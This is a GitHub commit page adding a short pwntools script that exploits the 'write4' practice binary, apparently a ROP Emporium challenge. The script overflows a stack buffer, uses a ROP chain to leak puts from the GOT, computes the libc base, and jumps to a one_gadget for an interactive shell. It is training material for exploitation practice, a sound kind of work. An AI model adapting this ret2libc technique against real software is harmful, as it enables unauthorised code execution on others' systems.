Skip to content

Commit

Permalink
exploit for 64-bit write4 binary
Browse files Browse the repository at this point in the history
  • Loading branch information
@AravGarg
AravGarg authored Mar 28, 2020
1 parent fbf1c74 commit cbd9161
Showing 1 changed file with 34 additions and 0 deletions.
34 changes: 34 additions & 0 deletions write4_64.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
from pwn import *
target=process('./write4')
elf=ELF('./write4')
libc=elf.libc
print(target.recvuntil("already!\n> "))

payload="A"*40

poprdi=0x400893
puts_plt=0x4005d0
puts_got=0x601018
pwnme=0x4007b5
one_gadget=0xe652b

payload+=p64(poprdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(pwnme)
payload+=p64(0x0)

target.sendline(payload)

leak=target.recvuntil("\x0a").strip("\x0a")
libc_puts=u64(leak+"\x00"*(8-len(leak)))
libc_base=libc_puts-libc.symbols["puts"]
print(hex(libc_base))
libc_gadget=libc_base+one_gadget

payload="A"*40
payload+=p64(libc_gadget)

target.sendline(payload)
target.interactive()

0 comments on commit cbd9161

Please sign in to comment.